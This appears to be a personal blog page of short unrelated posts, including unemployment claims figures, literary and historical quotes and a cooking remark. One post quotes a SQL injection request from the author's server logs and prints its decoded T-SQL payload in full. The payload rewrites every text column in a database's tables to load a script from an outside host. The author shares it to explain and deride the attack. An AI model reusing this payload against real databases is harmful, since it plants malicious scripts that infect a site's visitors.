Wcw

Seasonally adjusted unemployment claims per civilian, noninstitutional population, 1997-2008

In the week ending Aug. 30, the advance figure for seasonally adjusted initial claims was 444,000, an increase of 15,000 from the previous week's revised figure of 429,000. The 4-week moving average was 438,000, a decrease of 3,250 from the previous week's revised average of 441,250.

Unemployment Insurance Weekly Claims Report
Department of Labor, 4. September 2008

Quite a bump from my last update and starting to look pretty ugly on a per-population basis.

Ghidorah

"She would of been a good woman," The Misfit said, "if it had been somebody there to shoot her every minute of her life."

"Some fun!" Bobby Lee said.

"Shut up, Bobby Lee," The Misfit said. "It's no real pleasure in life."

Flannery O'Connor, A Good Man Is Hard To Find, 1955

xkcd.com P+C Randall Munroe

So, you're a dilettante. You let your box get rooted once. Eventually, you figure, "hey, let's upgrade!" So for the first time in a while I check logs. What do I find but some odd errors:

...ALERT - configured GET variable value length limit exceeded - dropped variable..

to which the attendant request looked like

"GET /?;DeCLARE @S CHAR(4000);SET @S=CAST(0x4445434C41.. [snip long hex] AS CHAR(4000));ExEC(@S); HTTP/1.1"

Let's translate:

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id
and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''">
</title><script src="http://www3.800mg.cn/csrss/w.js"></script>
<!--'' where '+@C+' not like ''%"></title>
<script src="http://www3.800mg.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

This is explained pretty well elsewhere. There is a complicated solution.

The joke here is that the solution is much easier. One, do not to install your webserver and db so stupidly they'll execute any old thing appended to a GET request. Two, consider not running SQL Server, to which this attack is specific, and not running Winders, to which malware ultimately is delivered.

I am annoyed by seeing this crap in my logs, though.

MacArthur surveys the beachhead on Leyte Island, 1944

I came out of Bataan and I shall return.

Douglas MacArthur, Terowie, Australia, 1942

Veal.

There are those who believe veal stock is unnecessary. Those people are idiots.

Carol Blymire, Veal Stock
French Laundry at Home, 20. April 2008

Hat tip: Ruhlman, of course.